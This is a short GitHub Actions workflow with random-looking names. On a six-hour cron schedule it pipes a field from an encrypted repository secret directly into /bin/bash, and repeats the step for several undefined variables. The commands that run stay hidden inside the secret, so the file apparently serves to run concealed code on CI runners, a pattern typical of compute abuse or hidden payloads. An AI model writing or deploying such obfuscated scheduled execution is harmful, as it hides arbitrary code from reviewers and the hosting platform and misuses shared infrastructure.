name: fanggeju4567

on:
  workflow_dispatch:
  schedule:
    - cron: '47 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fanggeju4567
        env:
          ztktv2: ${{ secrets.ztktv2 }}
        run: |
          echo $ztktv2 | jq -r .bzu35072 | /bin/bash
          echo $zagwb8701 | jq -r .e57 | /bin/bash
          echo $oojc8 | jq -r .y64 | /bin/bash
          echo $ut36 | jq -r .isf70 | /bin/bash
          echo $ii7798 | jq -r .oad4938 | /bin/bash
          echo $s21013 | jq -r .whqs2 | /bin/bash
          echo $dfa2 | jq -r .wuvg918 | /bin/bash

